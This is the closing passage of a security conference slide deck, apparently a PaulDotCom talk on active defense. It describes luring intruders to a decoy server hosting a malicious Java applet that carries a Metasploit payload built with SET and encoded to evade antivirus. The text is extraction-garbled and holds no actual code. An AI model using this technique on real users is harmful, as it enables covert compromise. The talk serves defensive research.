• Ifwecangetana"ackertoloadaJavapayload,whynotgivethemsomethinginteresOng,likeaMetaploitpayload?
• JavapayloadsareawesomeforpenetraOontesters,novulnerabiliOesrequired!
• Theycanalsobeusefulfora"ackers...
84
Justfor@beakerand@a9ri-on
![Page 85: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/85.jpg)
h"p://pauldotcom.com
EvilJavaApplica-on
• EmbedamaliciousJavaApplicaOoninanon‐producOonwebserver• Usuallyinadirectorythatisnoindexand/ornofollowinrobots.txt
• Thea"acker/vicOmwillgetapop‐upaskingiftheywanttoopentheJavaapplicaOon
• Theywill,a"ackerstendtobeverycurious
• Thepayloadcanbeflexible(Shell,Rootkit,VNC)
• YoucanautomaOcallyrunenumeraOonscriptswhenthea"acker/vicOmrunstheapplicaOon
85
![Page 86: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/86.jpg)
h"p://pauldotcom.com
BrowsingtoYourSite
EveryoneClicks“Run”
h"p://[YourLinuxIP]
86
![Page 87: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/87.jpg)
h"p://pauldotcom.com
ConfiguringSET
87
DaveKennedy,theauthorofSET,lovespurple.
![Page 91: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/91.jpg)
h"p://pauldotcom.com
ChoosingyourPayload
91
![Page 92: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/92.jpg)
h"p://pauldotcom.com
EncodingtoDodgeAV
92
![Page 94: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/94.jpg)
h"p://pauldotcom.com
HaveYourBacktrackSystemSurftoSET
94
![Page 95: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/95.jpg)
h"p://pauldotcom.com
NotPre9y..ButitWorks
95
![Page 96: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/96.jpg)
h"p://pauldotcom.com
Precau-onsandUsage
• Putthisontheinsideofthenetwork
• Carefulana"ackerdoesn’tredirectyourusers
• MakesurenoonecantakeoveryourMetasploitinstance
• Don’thavetodoanythingwiththeshell• Youcanautoruncertainnon‐damagingcommands
• pingyoursystem
96
![Page 97: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/97.jpg)
Listen
- http://pauldotcom.com/radio (24/7)
- Podcast in iTunes (audio/video)
Watch
- Live! http://pauldotcom.com/live
- “TV” http://pauldotcom.blip.tv
![Page 98: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/98.jpg)
Participate
- Mailing List: http://mail.pauldotcom.com
- Community: http://pauldotcom.com/insider
- IRC: irc.freenode.net #pauldotcom
Read
- http://pauldotcom.com (Blog)
- Email us [email protected]
![Page 99: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/99.jpg)
Want More?(Shameless Plug)
OFFENSIVE COUNTERMEASURES: DEFENSIVE TACTICS THAT ACTUALLY WORK
Black Hat Las Vegas 2011
Register Today!
![Page 100: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/100.jpg)
The End
Wake up, time for Questions?